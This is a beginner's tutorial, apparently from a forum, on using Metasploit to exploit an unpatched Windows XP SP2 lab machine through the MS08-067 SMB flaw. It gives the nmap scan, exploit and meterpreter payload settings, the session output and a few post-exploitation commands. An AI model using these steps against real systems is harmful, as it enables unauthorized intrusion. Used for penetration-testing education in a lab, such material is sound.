This tutorial will give a basic introduction to metasploit.
In the process, we'll also exploit a machine and run meterpreter on it.
Everything that needs to be typed in console makes use of the code tag
Also, I assume you have some basic understanding of networking and linux.Code:msfconsole
WARNING, it is illegal to access a machine in any way that you do not have permission to access and it might get you in jail. I am not responsible for the actions you take. You have been warned.
now on to the actual guide.
backtrack 4 final
non-patched windows xp sp2 box
(confirmed that this does not work on xp sp3)
These are my ip's, make sure to change it to reflect your own settings
Ok, first things first, make sure that metasploit is updated.
Code:/pentest/exploits/fasttrack/fast-track.py -i 1 2
Do a nmap scan to make sure there are some open ports (with hopefully vulnerable services)
Nmap is done scanning and showed me 3 open ports. (if yours say filtered on all ports, try turning off any firewall)Code:nmap -v 192.168.198.130
These are port 135, 139, 445.
We're going to focus on port 445.
A quick search on google shows us that port 445 is commonly used for smb.
start up metasploit
when its done loading,Code:msfconsole
We need an exploit for smb, so we need to choose one from smb folder. I used the ms08_067_netapi exploit.Code:show exploits windows
Notice that after we typed this, msf > changed to msf exploit(ms08_067_netapi)>Code:use windows/smb/ms08_067_netapi
Great, so now we have an exploit, but what next?
an exploit is useless without a payload, so
This will give us a list of payloads compatible with the exploit.Code:show payloads
We're going to use a meterpreter payload for this tutorial
now to configure it allCode:set payload windows/meterpreter/bind_tcp
target is the which windows version and service pack our victim is (our case xp sp2)Code:info set target 3 set rhost 192.168.198.130
though, you could also leave it how it is.
rhost is the ip of the victim
everything else can be default.
if the payload was a reverse tcp, we would also need to set lhost
lhost is the attackers ip.
this is what we (should) get:Code:exploit
great! we're in![*] Started bind handler
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.198.129:60087 -> 192.168.198.130:4444
lets see what commands we got at our disposal
under what username is meterpreter running?Code:help
what processes are running?Code:getuid
and so we can go on and on about what we can do with meterpreter, but that is outside of the scope of this tutorial.Code:ps
hope this guide has been useful to someone, somewhere.
for a more indepth guide to what metasploit can do, check this link.
Metasploit Unleashed - Mastering the Framework